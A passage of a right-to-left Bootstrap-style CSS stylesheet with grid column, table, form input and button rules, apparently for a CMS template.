  .col-md-pull-0 {
    left: auto;
  }
  .col-md-push-12 {
    right: 100%;
  }
  .col-md-push-11 {
    right: 91.66666667%;
  }
  .col-md-push-10 {
    right: 83.33333333%;
  }
  .col-md-push-9 {
    right: 75%;
  }
  .col-md-push-8 {
    right: 66.66666667%;
  }
  .col-md-push-7 {
    right: 58.33333333%;
  }
  .col-md-push-6 {
    right: 50%;
  }
  .col-md-push-5 {
    right: 41.66666667%;
  }
  .col-md-push-4 {
    right: 33.33333333%;
  }
  .col-md-push-3 {
    right: 25%;
  }
  .col-md-push-2 {
    right: 16.66666667%;
  }
  .col-md-push-1 {
    right: 8.33333333%;
  }
  .col-md-push-0 {
    right: auto;
  }
  .col-md-offset-12 {
    margin-right: 100%;
  }
  .col-md-offset-11 {
    margin-right: 91.66666667%;
  }
  .col-md-offset-10 {
    margin-right: 83.33333333%;
  }
  .col-md-offset-9 {
    margin-right: 75%;
  }
  .col-md-offset-8 {
    margin-right: 66.66666667%;
  }
  .col-md-offset-7 {
    margin-right: 58.33333333%;
  }
  .col-md-offset-6 {
    margin-right: 50%;
  }
  .col-md-offset-5 {
    margin-right: 41.66666667%;
  }
  .col-md-offset-4 {
    margin-right: 33.33333333%;
  }
  .col-md-offset-3 {
    margin-right: 25%;
  }
  .col-md-offset-2 {
    margin-right: 16.66666667%;
  }
  .col-md-offset-1 {
    margin-right: 8.33333333%;
  }
  .col-md-offset-0 {
    margin-right: 0%;
  }
}
@media (min-width: 1200px) {
  .col-lg-1, .col-lg-2, .col-lg-3, .col-lg-4, .col-lg-5, .col-lg-6, .col-lg-7, .col-lg-8, .col-lg-9, .col-lg-10, .col-lg-11, .col-lg-12 {
    float: right;
  }
  .col-lg-12 {
    width: 100%;
  }
  .col-lg-11 {
    width: 91.66666667%;
  }
  .col-lg-10 {
    width: 83.33333333%;
  }
  .col-lg-9 {
    width: 75%;
  }
  .col-lg-8 {
    width: 66.66666667%;
  }
  .col-lg-7 {
    width: 58.33333333%;
  }
  .col-lg-6 {
    width: 50%;
  }
  .col-lg-5 {
    width: 41.66666667%;
  }
  .col-lg-4 {
    width: 33.33333333%;
  }
  .col-lg-3 {
    width: 25%;
  }
  .col-lg-2 {
    width: 16.66666667%;
  }
  .col-lg-1 {
    width: 8.33333333%;
  }
  .col-lg-pull-12 {
    left: 100%;
  }
  .col-lg-pull-11 {
    left: 91.66666667%;
  }
  .col-lg-pull-10 {
    left: 83.33333333%;
  }
  .col-lg-pull-9 {
    left: 75%;
  }
  .col-lg-pull-8 {
    left: 66.66666667%;
  }
  .col-lg-pull-7 {
    left: 58.33333333%;
  }
  .col-lg-pull-6 {
    left: 50%;
  }
  .col-lg-pull-5 {
    left: 41.66666667%;
  }
  .col-lg-pull-4 {
    left: 33.33333333%;
  }
  .col-lg-pull-3 {
    left: 25%;
  }
  .col-lg-pull-2 {
    left: 16.66666667%;
  }
  .col-lg-pull-1 {
    left: 8.33333333%;
  }
  .col-lg-pull-0 {
    left: auto;
  }
  .col-lg-push-12 {
    right: 100%;
  }
  .col-lg-push-11 {
    right: 91.66666667%;
  }
  .col-lg-push-10 {
    right: 83.33333333%;
  }
  .col-lg-push-9 {
    right: 75%;
  }
  .col-lg-push-8 {
    right: 66.66666667%;
  }
  .col-lg-push-7 {
    right: 58.33333333%;
  }
  .col-lg-push-6 {
    right: 50%;
  }
  .col-lg-push-5 {
    right: 41.66666667%;
  }
  .col-lg-push-4 {
    right: 33.33333333%;
  }
  .col-lg-push-3 {
    right: 25%;
  }
  .col-lg-push-2 {
    right: 16.66666667%;
  }
  .col-lg-push-1 {
    right: 8.33333333%;
  }
  .col-lg-push-0 {
    right: auto;
  }
  .col-lg-offset-12 {
    margin-right: 100%;
  }
  .col-lg-offset-11 {
    margin-right: 91.66666667%;
  }
  .col-lg-offset-10 {
    margin-right: 83.33333333%;
  }
  .col-lg-offset-9 {
    margin-right: 75%;
  }
  .col-lg-offset-8 {
    margin-right: 66.66666667%;
  }
  .col-lg-offset-7 {
    margin-right: 58.33333333%;
  }
  .col-lg-offset-6 {
    margin-right: 50%;
  }
  .col-lg-offset-5 {
    margin-right: 41.66666667%;
  }
  .col-lg-offset-4 {
    margin-right: 33.33333333%;
  }
  .col-lg-offset-3 {
    margin-right: 25%;
  }
  .col-lg-offset-2 {
    margin-right: 16.66666667%;
  }
  .col-lg-offset-1 {
    margin-right: 8.33333333%;
  }
  .col-lg-offset-0 {
    margin-right: 0%;
  }
}
table {
  background-color: transparent;
}
table col[class*="col-"] {
  position: static;
  display: table-column;
  float: none;
}
table td[class*="col-"],
table th[class*="col-"] {
  position: static;
  display: table-cell;
  float: none;
}
caption {
  padding-top: 8px;
  padding-bottom: 8px;
  color: #999999;
  text-align: right;
}
th {
  text-align: right;
}
.table {
  width: 100%;
  max-width: 100%;
  margin-bottom: 20px;
}
.table > thead > tr > th,
.table > tbody > tr > th,
.table > tfoot > tr > th,
.table > thead > tr > td,
.table > tbody > tr > td,
.table > tfoot > tr > td {
  padding: 8px;
  line-height: 1.42857143;
  vertical-align: top;
  border-top: 1px solid #dddddd;
}
.table > thead > tr > th {
  vertical-align: bottom;
  border-bottom: 2px solid #dddddd;
}
.table > caption + thead > tr:first-child > th,
.table > colgroup + thead > tr:first-child > th,
.table > thead:first-child > tr:first-child > th,
.table > caption + thead > tr:first-child > td,
.table > colgroup + thead > tr:first-child > td,
.table > thead:first-child > tr:first-child > td {
  border-top: 0;
}
.table > tbody + tbody {
  border-top: 2px solid #dddddd;
}
.table .table {
  background-color: #ffffff;
}
.table-condensed > thead > tr > th,
.table-condensed > tbody > tr > th,
.table-condensed > tfoot > tr > th,
.table-condensed > thead > tr > td,
.table-condensed > tbody > tr > td,
.table-condensed > tfoot > tr > td {
  padding: 5px;
}
.table-bordered {
  border: 1px solid #dddddd;
}
.table-bordered > thead > tr > th,
.table-bordered > tbody > tr > th,
.table-bordered > tfoot > tr > th,
.table-bordered > thead > tr > td,
.table-bordered > tbody > tr > td,
.table-bordered > tfoot > tr > td {
  border: 1px solid #dddddd;
}
.table-bordered > thead > tr > th,
.table-bordered > thead > tr > td {
  border-bottom-width: 2px;
}
.table-striped > tbody > tr:nth-of-type(odd) {
  background-color: #f9f9f9;
}
.table-hover > tbody > tr:hover {
  background-color: #f5f5f5;
}
.table > thead > tr > td.active,
.table > tbody > tr > td.active,
.table > tfoot > tr > td.active,
.table > thead > tr > th.active,
.table > tbody > tr > th.active,
.table > tfoot > tr > th.active,
.table > thead > tr.active > td,
.table > tbody > tr.active > td,
.table > tfoot > tr.active > td,
.table > thead > tr.active > th,
.table > tbody > tr.active > th,
.table > tfoot > tr.active > th {
  background-color: #f5f5f5;
}
.table-hover > tbody > tr > td.active:hover,
.table-hover > tbody > tr > th.active:hover,
.table-hover > tbody > tr.active:hover > td,
.table-hover > tbody > tr:hover > .active,
.table-hover > tbody > tr.active:hover > th {
  background-color: #e8e8e8;
}
.table > thead > tr > td.success,
.table > tbody > tr > td.success,
.table > tfoot > tr > td.success,
.table > thead > tr > th.success,
.table > tbody > tr > th.success,
.table > tfoot > tr > th.success,
.table > thead > tr.success > td,
.table > tbody > tr.success > td,
.table > tfoot > tr.success > td,
.table > thead > tr.success > th,
.table > tbody > tr.success > th,
.table > tfoot > tr.success > th {
  background-color: #dff0d8;
}
.table-hover > tbody > tr > td.success:hover,
.table-hover > tbody > tr > th.success:hover,
.table-hover > tbody > tr.success:hover > td,
.table-hover > tbody > tr:hover > .success,
.table-hover > tbody > tr.success:hover > th {
  background-color: #d0e9c6;
}
.table > thead > tr > td.info,
.table > tbody > tr > td.info,
.table > tfoot > tr > td.info,
.table > thead > tr > th.info,
.table > tbody > tr > th.info,
.table > tfoot > tr > th.info,
.table > thead > tr.info > td,
.table > tbody > tr.info > td,
.table > tfoot > tr.info > td,
.table > thead > tr.info > th,
.table > tbody > tr.info > th,
.table > tfoot > tr.info > th {
  background-color: #d9edf7;
}
.table-hover > tbody > tr > td.info:hover,
.table-hover > tbody > tr > th.info:hover,
.table-hover > tbody > tr.info:hover > td,
.table-hover > tbody > tr:hover > .info,
.table-hover > tbody > tr.info:hover > th {
  background-color: #c4e3f3;
}
.table > thead > tr > td.warning,
.table > tbody > tr > td.warning,
.table > tfoot > tr > td.warning,
.table > thead > tr > th.warning,
.table > tbody > tr > th.warning,
.table > tfoot > tr > th.warning,
.table > thead > tr.warning > td,
.table > tbody > tr.warning > td,
.table > tfoot > tr.warning > td,
.table > thead > tr.warning > th,
.table > tbody > tr.warning > th,
.table > tfoot > tr.warning > th {
  background-color: #fcf8e3;
}
.table-hover > tbody > tr > td.warning:hover,
.table-hover > tbody > tr > th.warning:hover,
.table-hover > tbody > tr.warning:hover > td,
.table-hover > tbody > tr:hover > .warning,
.table-hover > tbody > tr.warning:hover > th {
  background-color: #faf2cc;
}
.table > thead > tr > td.danger,
.table > tbody > tr > td.danger,
.table > tfoot > tr > td.danger,
.table > thead > tr > th.danger,
.table > tbody > tr > th.danger,
.table > tfoot > tr > th.danger,
.table > thead > tr.danger > td,
.table > tbody > tr.danger > td,
.table > tfoot > tr.danger > td,
.table > thead > tr.danger > th,
.table > tbody > tr.danger > th,
.table > tfoot > tr.danger > th {
  background-color: #f2dede;
}
.table-hover > tbody > tr > td.danger:hover,
.table-hover > tbody > tr > th.danger:hover,
.table-hover > tbody > tr.danger:hover > td,
.table-hover > tbody > tr:hover > .danger,
.table-hover > tbody > tr.danger:hover > th {
  background-color: #ebcccc;
}
.table-responsive {
  min-height: .01%;
  overflow-x: auto;
}
@media screen and (max-width: 767px) {
  .table-responsive {
    width: 100%;
    margin-bottom: 15px;
    overflow-y: hidden;
    -ms-overflow-style: -ms-autohiding-scrollbar;
    border: 1px solid #dddddd;
  }
  .table-responsive > .table {
    margin-bottom: 0;
  }
  .table-responsive > .table > thead > tr > th,
  .table-responsive > .table > tbody > tr > th,
  .table-responsive > .table > tfoot > tr > th,
  .table-responsive > .table > thead > tr > td,
  .table-responsive > .table > tbody > tr > td,
  .table-responsive > .table > tfoot > tr > td {
    white-space: nowrap;
  }
  .table-responsive > .table-bordered {
    border: 0;
  }
  .table-responsive > .table-bordered > thead > tr > th:first-child,
  .table-responsive > .table-bordered > tbody > tr > th:first-child,
  .table-responsive > .table-bordered > tfoot > tr > th:first-child,
  .table-responsive > .table-bordered > thead > tr > td:first-child,
  .table-responsive > .table-bordered > tbody > tr > td:first-child,
  .table-responsive > .table-bordered > tfoot > tr > td:first-child {
    border-right: 0;
  }
  .table-responsive > .table-bordered > thead > tr > th:last-child,
  .table-responsive > .table-bordered > tbody > tr > th:last-child,
  .table-responsive > .table-bordered > tfoot > tr > th:last-child,
  .table-responsive > .table-bordered > thead > tr > td:last-child,
  .table-responsive > .table-bordered > tbody > tr > td:last-child,
  .table-responsive > .table-bordered > tfoot > tr > td:last-child {
    border-left: 0;
  }
  .table-responsive > .table-bordered > tbody > tr:last-child > th,
  .table-responsive > .table-bordered > tfoot > tr:last-child > th,
  .table-responsive > .table-bordered > tbody > tr:last-child > td,
  .table-responsive > .table-bordered > tfoot > tr:last-child > td {
    border-bottom: 0;
  }
}
select,
textarea,
input[type="text"],
input[type="password"],
input[type="datetime"],
input[type="datetime-local"],
input[type="date"],
input[type="month"],
input[type="time"],
input[type="week"],
input[type="number"],
input[type="email"],
input[type="url"],
input[type="search"],
input[type="tel"],
input[type="color"],
.inputbox {
  display: block;
  width: 100%;
  height: 34px;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.42857143;
  color: #666666;
  background-color: #ffffff;
  background-image: none;
  border: 1px solid #cccccc;
  border-radius: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  -webkit-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  -o-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
}
select:focus,
textarea:focus,
input[type="text"]:focus,
input[type="password"]:focus,
input[type="datetime"]:focus,
input[type="datetime-local"]:focus,
input[type="date"]:focus,
input[type="month"]:focus,
input[type="time"]:focus,
input[type="week"]:focus,
input[type="number"]:focus,
input[type="email"]:focus,
input[type="url"]:focus,
input[type="search"]:focus,
input[type="tel"]:focus,
input[type="color"]:focus,
.inputbox:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
}
select::-moz-placeholder,
textarea::-moz-placeholder,
input[type="text"]::-moz-placeholder,
input[type="password"]::-moz-placeholder,
input[type="datetime"]::-moz-placeholder,
input[type="datetime-local"]::-moz-placeholder,
input[type="date"]::-moz-placeholder,
input[type="month"]::-moz-placeholder,
input[type="time"]::-moz-placeholder,
input[type="week"]::-moz-placeholder,
input[type="number"]::-moz-placeholder,
input[type="email"]::-moz-placeholder,
input[type="url"]::-moz-placeholder,
input[type="search"]::-moz-placeholder,
input[type="tel"]::-moz-placeholder,
input[type="color"]::-moz-placeholder,
.inputbox::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
select:-ms-input-placeholder,
textarea:-ms-input-placeholder,
input[type="text"]:-ms-input-placeholder,
input[type="password"]:-ms-input-placeholder,
input[type="datetime"]:-ms-input-placeholder,
input[type="datetime-local"]:-ms-input-placeholder,
input[type="date"]:-ms-input-placeholder,
input[type="month"]:-ms-input-placeholder,
input[type="time"]:-ms-input-placeholder,
input[type="week"]:-ms-input-placeholder,
input[type="number"]:-ms-input-placeholder,
input[type="email"]:-ms-input-placeholder,
input[type="url"]:-ms-input-placeholder,
input[type="search"]:-ms-input-placeholder,
input[type="tel"]:-ms-input-placeholder,
input[type="color"]:-ms-input-placeholder,
.inputbox:-ms-input-placeholder {
  color: #999999;
}
select::-webkit-input-placeholder,
textarea::-webkit-input-placeholder,
input[type="text"]::-webkit-input-placeholder,
input[type="password"]::-webkit-input-placeholder,
input[type="datetime"]::-webkit-input-placeholder,
input[type="datetime-local"]::-webkit-input-placeholder,
input[type="date"]::-webkit-input-placeholder,
input[type="month"]::-webkit-input-placeholder,
input[type="time"]::-webkit-input-placeholder,
input[type="week"]::-webkit-input-placeholder,
input[type="number"]::-webkit-input-placeholder,
input[type="email"]::-webkit-input-placeholder,
input[type="url"]::-webkit-input-placeholder,
input[type="search"]::-webkit-input-placeholder,
input[type="tel"]::-webkit-input-placeholder,
input[type="color"]::-webkit-input-placeholder,
.inputbox::-webkit-input-placeholder {
  color: #999999;
}
select::-ms-expand,
textarea::-ms-expand,
input[type="text"]::-ms-expand,
input[type="password"]::-ms-expand,
input[type="datetime"]::-ms-expand,
input[type="datetime-local"]::-ms-expand,
input[type="date"]::-ms-expand,
input[type="month"]::-ms-expand,
input[type="time"]::-ms-expand,
input[type="week"]::-ms-expand,
input[type="number"]::-ms-expand,
input[type="email"]::-ms-expand,
input[type="url"]::-ms-expand,
input[type="search"]::-ms-expand,
input[type="tel"]::-ms-expand,
input[type="color"]::-ms-expand,
.inputbox::-ms-expand {
  background-color: transparent;
  border: 0;
}
select[disabled],
textarea[disabled],
input[type="text"][disabled],
input[type="password"][disabled],
input[type="datetime"][disabled],
input[type="datetime-local"][disabled],
input[type="date"][disabled],
input[type="month"][disabled],
input[type="time"][disabled],
input[type="week"][disabled],
input[type="number"][disabled],
input[type="email"][disabled],
input[type="url"][disabled],
input[type="search"][disabled],
input[type="tel"][disabled],
input[type="color"][disabled],
.inputbox[disabled],
select[readonly],
textarea[readonly],
input[type="text"][readonly],
input[type="password"][readonly],
input[type="datetime"][readonly],
input[type="datetime-local"][readonly],
input[type="date"][readonly],
input[type="month"][readonly],
input[type="time"][readonly],
input[type="week"][readonly],
input[type="number"][readonly],
input[type="email"][readonly],
input[type="url"][readonly],
input[type="search"][readonly],
input[type="tel"][readonly],
input[type="color"][readonly],
.inputbox[readonly],
fieldset[disabled] select,
fieldset[disabled] textarea,
fieldset[disabled] input[type="text"],
fieldset[disabled] input[type="password"],
fieldset[disabled] input[type="datetime"],
fieldset[disabled] input[type="datetime-local"],
fieldset[disabled] input[type="date"],
fieldset[disabled] input[type="month"],
fieldset[disabled] input[type="time"],
fieldset[disabled] input[type="week"],
fieldset[disabled] input[type="number"],
fieldset[disabled] input[type="email"],
fieldset[disabled] input[type="url"],
fieldset[disabled] input[type="search"],
fieldset[disabled] input[type="tel"],
fieldset[disabled] input[type="color"],
fieldset[disabled] .inputbox {
  background-color: #eeeeee;
  opacity: 1;
}
select[disabled],
textarea[disabled],
input[type="text"][disabled],
input[type="password"][disabled],
input[type="datetime"][disabled],
input[type="datetime-local"][disabled],
input[type="date"][disabled],
input[type="month"][disabled],
input[type="time"][disabled],
input[type="week"][disabled],
input[type="number"][disabled],
input[type="email"][disabled],
input[type="url"][disabled],
input[type="search"][disabled],
input[type="tel"][disabled],
input[type="color"][disabled],
.inputbox[disabled],
fieldset[disabled] select,
fieldset[disabled] textarea,
fieldset[disabled] input[type="text"],
fieldset[disabled] input[type="password"],
fieldset[disabled] input[type="datetime"],
fieldset[disabled] input[type="datetime-local"],
fieldset[disabled] input[type="date"],
fieldset[disabled] input[type="month"],
fieldset[disabled] input[type="time"],
fieldset[disabled] input[type="week"],
fieldset[disabled] input[type="number"],
fieldset[disabled] input[type="email"],
fieldset[disabled] input[type="url"],
fieldset[disabled] input[type="search"],
fieldset[disabled] input[type="tel"],
fieldset[disabled] input[type="color"],
fieldset[disabled] .inputbox {
  cursor: not-allowed;
}
textareaselect,
textareatextarea,
textareainput[type="text"],
textareainput[type="password"],
textareainput[type="datetime"],
textareainput[type="datetime-local"],
textareainput[type="date"],
textareainput[type="month"],
textareainput[type="time"],
textareainput[type="week"],
textareainput[type="number"],
textareainput[type="email"],
textareainput[type="url"],
textareainput[type="search"],
textareainput[type="tel"],
textareainput[type="color"],
textarea.inputbox {
  height: auto;
}
select:focus,
textarea:focus,
input[type="text"]:focus,
input[type="password"]:focus,
input[type="datetime"]:focus,
input[type="datetime-local"]:focus,
input[type="date"]:focus,
input[type="month"]:focus,
input[type="time"]:focus,
input[type="week"]:focus,
input[type="number"]:focus,
input[type="email"]:focus,
input[type="url"]:focus,
input[type="search"]:focus,
input[type="tel"]:focus,
input[type="color"]:focus,
.inputbox:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
}
select::-moz-placeholder,
textarea::-moz-placeholder,
input[type="text"]::-moz-placeholder,
input[type="password"]::-moz-placeholder,
input[type="datetime"]::-moz-placeholder,
input[type="datetime-local"]::-moz-placeholder,
input[type="date"]::-moz-placeholder,
input[type="month"]::-moz-placeholder,
input[type="time"]::-moz-placeholder,
input[type="week"]::-moz-placeholder,
input[type="number"]::-moz-placeholder,
input[type="email"]::-moz-placeholder,
input[type="url"]::-moz-placeholder,
input[type="search"]::-moz-placeholder,
input[type="tel"]::-moz-placeholder,
input[type="color"]::-moz-placeholder,
.inputbox::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
select:-ms-input-placeholder,
textarea:-ms-input-placeholder,
input[type="text"]:-ms-input-placeholder,
input[type="password"]:-ms-input-placeholder,
input[type="datetime"]:-ms-input-placeholder,
input[type="datetime-local"]:-ms-input-placeholder,
input[type="date"]:-ms-input-placeholder,
input[type="month"]:-ms-input-placeholder,
input[type="time"]:-ms-input-placeholder,
input[type="week"]:-ms-input-placeholder,
input[type="number"]:-ms-input-placeholder,
input[type="email"]:-ms-input-placeholder,
input[type="url"]:-ms-input-placeholder,
input[type="search"]:-ms-input-placeholder,
input[type="tel"]:-ms-input-placeholder,
input[type="color"]:-ms-input-placeholder,
.inputbox:-ms-input-placeholder {
  color: #999999;
}
select::-webkit-input-placeholder,
textarea::-webkit-input-placeholder,
input[type="text"]::-webkit-input-placeholder,
input[type="password"]::-webkit-input-placeholder,
input[type="datetime"]::-webkit-input-placeholder,
input[type="datetime-local"]::-webkit-input-placeholder,
input[type="date"]::-webkit-input-placeholder,
input[type="month"]::-webkit-input-placeholder,
input[type="time"]::-webkit-input-placeholder,
input[type="week"]::-webkit-input-placeholder,
input[type="number"]::-webkit-input-placeholder,
input[type="email"]::-webkit-input-placeholder,
input[type="url"]::-webkit-input-placeholder,
input[type="search"]::-webkit-input-placeholder,
input[type="tel"]::-webkit-input-placeholder,
input[type="color"]::-webkit-input-placeholder,
.inputbox::-webkit-input-placeholder {
  color: #999999;
}
select[disabled],
textarea[disabled],
input[type="text"][disabled],
input[type="password"][disabled],
input[type="datetime"][disabled],
input[type="datetime-local"][disabled],
input[type="date"][disabled],
input[type="month"][disabled],
input[type="time"][disabled],
input[type="week"][disabled],
input[type="number"][disabled],
input[type="email"][disabled],
input[type="url"][disabled],
input[type="search"][disabled],
input[type="tel"][disabled],
input[type="color"][disabled],
.inputbox[disabled],
select[readonly],
textarea[readonly],
input[type="text"][readonly],
input[type="password"][readonly],
input[type="datetime"][readonly],
input[type="datetime-local"][readonly],
input[type="date"][readonly],
input[type="month"][readonly],
input[type="time"][readonly],
input[type="week"][readonly],
input[type="number"][readonly],
input[type="email"][readonly],
input[type="url"][readonly],
input[type="search"][readonly],
input[type="tel"][readonly],
input[type="color"][readonly],
.inputbox[readonly],
fieldset[disabled] select,
fieldset[disabled] textarea,
fieldset[disabled] input[type="text"],
fieldset[disabled] input[type="password"],
fieldset[disabled] input[type="datetime"],
fieldset[disabled] input[type="datetime-local"],
fieldset[disabled] input[type="date"],
fieldset[disabled] input[type="month"],
fieldset[disabled] input[type="time"],
fieldset[disabled] input[type="week"],
fieldset[disabled] input[type="number"],
fieldset[disabled] input[type="email"],
fieldset[disabled] input[type="url"],
fieldset[disabled] input[type="search"],
fieldset[disabled] input[type="tel"],
fieldset[disabled] input[type="color"],
fieldset[disabled] .inputbox {
  cursor: not-allowed;
  background-color: #eeeeee;
}
textareaselect,
textareatextarea,
textareainput[type="text"],
textareainput[type="password"],
textareainput[type="datetime"],
textareainput[type="datetime-local"],
textareainput[type="date"],
textareainput[type="month"],
textareainput[type="time"],
textareainput[type="week"],
textareainput[type="number"],
textareainput[type="email"],
textareainput[type="url"],
textareainput[type="search"],
textareainput[type="tel"],
textareainput[type="color"],
textarea.inputbox {
  height: auto;
}
@media screen and (min-width: 768px) {
  select,
  textarea,
  input[type="text"],
  input[type="password"],
  input[type="datetime"],
  input[type="datetime-local"],
  input[type="date"],
  input[type="month"],
  input[type="time"],
  input[type="week"],
  input[type="number"],
  input[type="email"],
  input[type="url"],
  input[type="search"],
  input[type="tel"],
  input[type="color"],
  .inputbox {
    width: auto;
  }
}
select,
select.form-control,
select.inputbox,
select.input {
  padding-left: 5px;
}
.input-mini {
  width: 60px;
}
.input-small {
  width: 90px;
}
.input-medium {
  width: 150px;
}
.input-large {
  width: 210px;
}
.input-xlarge {
  width: 270px;
}
.input-xxlarge {
  width: 530px;
}
input.input-sm {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0;
}
selectinput.input-sm {
  height: 30px;
  line-height: 30px;
}
textareainput.input-sm,
select[multiple]input.input-sm {
  height: auto;
}
input.input-lg {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0;
}
selectinput.input-lg {
  height: 45px;
  line-height: 45px;
}
textareainput.input-lg,
select[multiple]input.input-lg {
  height: auto;
}
@media (min-width: 768px) {
  .form-inline .inputbox,
  .form-inline select,
  .form-inline textarea,
  .form-inline input {
    display: inline-block;
  }
}
.control-group {
  margin-bottom: 10px;
}
legend + .control-group {
  margin-top: 20px;
  -webkit-margin-top-collapse: separate;
}
.form-horizontal .control-group {
  margin-bottom: 20px;
}
.form-horizontal .control-group:before,
.form-horizontal .control-group:after {
  display: table;
  content: " ";
}
.form-horizontal .control-group:after {
  clear: both;
}
.form-horizontal .control-group:before,
.form-horizontal .control-group:after {
  display: table;
  content: " ";
}
.form-horizontal .control-group:after {
  clear: both;
}
.form-horizontal .control-group .control-label {
  display: block;
  width: 100%;
}
@media (min-width: 768px) {
  .form-horizontal .control-group .control-label {
    display: inline-block;
    float: right;
    width: 160px;
    padding-top: 5px;
    text-align: left;
  }
}
.form-horizontal .control-group .controls {
  margin-right: 180px;
}
.form-actions {
  padding: 20px;
  margin: 20px 0;
  background-color: #eeeeee;
  border-radius: 0;
}
.form-actions:before,
.form-actions:after {
  display: table;
  content: " ";
}
.form-actions:after {
  clear: both;
}
.form-actions:before,
.form-actions:after {
  display: table;
  content: " ";
}
.form-actions:after {
  clear: both;
}
.form-actions [class*="col-sm-offset-"],
.form-actions [class*="col-md-offset-"] {
  padding-right: 5px !important;
}
.input-append,
.input-prepend {
  display: inline-block;
  margin-bottom: 10px;
  vertical-align: middle;
  font-size: 0;
  white-space: nowrap;
}
.input-append input,
.input-prepend input,
.input-append select,
.input-prepend select,
.input-append .uneditable-input,
.input-prepend .uneditable-input,
.input-append .dropdown-menu,
.input-prepend .dropdown-menu,
.input-append .popover,
.input-prepend .popover {
  font-size: 14px;
}
.input-append input,
.input-prepend input,
.input-append select,
.input-prepend select,
.input-append .uneditable-input,
.input-prepend .uneditable-input {
  position: relative;
  margin-bottom: 0;
  *margin-right: 0;
  vertical-align: top;
  border-radius: 0 0 0 0;
}
.input-append input:focus,
.input-prepend input:focus,
.input-append select:focus,
.input-prepend select:focus,
.input-append .uneditable-input:focus,
.input-prepend .uneditable-input:focus {
  z-index: 2;
}
.input-append .add-on,
.input-prepend .add-on {
  display: inline-block;
  width: auto;
  height: 34px;
  min-width: 16px;
  padding: 4px 5px;
  font-size: 14px;
  font-weight: normal;
  line-height: 1.42857143;
  text-align: center;
  background-color: #eeeeee;
  border: 1px solid #ccc;
}
.input-append .add-on,
.input-prepend .add-on,
.input-append .btn,
.input-prepend .btn,
.input-append .btn-group > .dropdown-toggle,
.input-prepend .btn-group > .dropdown-toggle {
  vertical-align: top;
  border-radius: 0;
}
.input-append .active,
.input-prepend .active {
  background-color: #9bd7a8;
  border-color: #3e9b52;
}
.input-prepend .add-on,
.input-prepend .btn {
  margin-left: -1px;
}
.input-prepend .add-on:first-child,
.input-prepend .btn:first-child {
  border-radius: 0 0 0 0;
}
.input-append input,
.input-append select,
.input-append .uneditable-input {
  border-radius: 0 0 0 0;
}
.input-append input + .btn-group .btn:last-child,
.input-append select + .btn-group .btn:last-child,
.input-append .uneditable-input + .btn-group .btn:last-child {
  border-radius: 0 0 0 0;
}
.input-append .add-on,
.input-append .btn,
.input-append .btn-group {
  margin-right: -1px;
}
.input-append .add-on:last-child,
.input-append .btn:last-child,
.input-append .btn-group:last-child > .dropdown-toggle {
  border-radius: 0 0 0 0;
}
.input-prepend.input-append input,
.input-prepend.input-append select,
.input-prepend.input-append .uneditable-input {
  border-radius: 0;
}
.input-prepend.input-append input + .btn-group .btn,
.input-prepend.input-append select + .btn-group .btn,
.input-prepend.input-append .uneditable-input + .btn-group .btn {
  border-radius: 0 0 0 0;
}
.input-prepend.input-append .add-on:first-child,
.input-prepend.input-append .btn:first-child {
  margin-left: -1px;
  border-radius: 0 0 0 0;
}
.input-prepend.input-append .add-on:last-child,
.input-prepend.input-append .btn:last-child {
  margin-right: -1px;
  border-radius: 0 0 0 0;
}
.input-prepend.input-append .btn-group:first-child {
  margin-right: 0;
}
.btn-large {
  padding: 10px 16px;
  font-size: 18px;
  border-radius: 0;
}
.btn-large [class^="icon-"],
.btn-large [class*=" icon-"] {
  margin-top: 4px;
}
.btn-small {
  padding: 5px 10px;
  font-size: 12px;
  border-radius: 0;
}
.btn-small [class^="icon-"],
.btn-small [class*=" icon-"] {
  margin-top: 0;
}
.btn-mini {
  padding: 2px 4px;
  font-size: 12px;
  border-radius: 0;
}
.btn-mini [class^="icon-"],
.btn-mini [class*=" icon-"] {
  margin-top: -1px;
}

fieldset {
  min-width: 0;
  padding: 0;
  margin: 0;
  border: 0;
}
legend {
  display: block;
  width: 100%;
  padding: 0;
  margin-bottom: 20px;
  font-size: 21px;
  line-height: inherit;
  color: #444444;
  border: 0;
  border-bottom: 1px solid #e5e5e5;
}
label {
  display: inline-block;
  max-width: 100%;
  margin-bottom: 5px;
  font-weight: 700;
}
input[type="search"] {
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
  -webkit-appearance: none;
  appearance: none;
}
input[type="radio"],
input[type="checkbox"] {
  margin: 4px 0 0;
  margin-top: 1px \9;
  line-height: normal;
}
input[type="radio"][disabled],
input[type="checkbox"][disabled],
input[type="radio"].disabled,
input[type="checkbox"].disabled,
fieldset[disabled] input[type="radio"],
fieldset[disabled] input[type="checkbox"] {
  cursor: not-allowed;
}
input[type="file"] {
  display: block;
}
input[type="range"] {
  display: block;
  width: 100%;
}
select[multiple],
select[size] {
  height: auto;
}
input[type="file"]:focus,
input[type="radio"]:focus,
input[type="checkbox"]:focus {
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
output {
  display: block;
  padding-top: 7px;
  font-size: 14px;
  line-height: 1.42857143;
  color: #666666;
}
.form-control {
  display: block;
  width: 100%;
  height: 34px;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.42857143;
  color: #666666;
  background-color: #ffffff;
  background-image: none;
  border: 1px solid #cccccc;
  border-radius: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
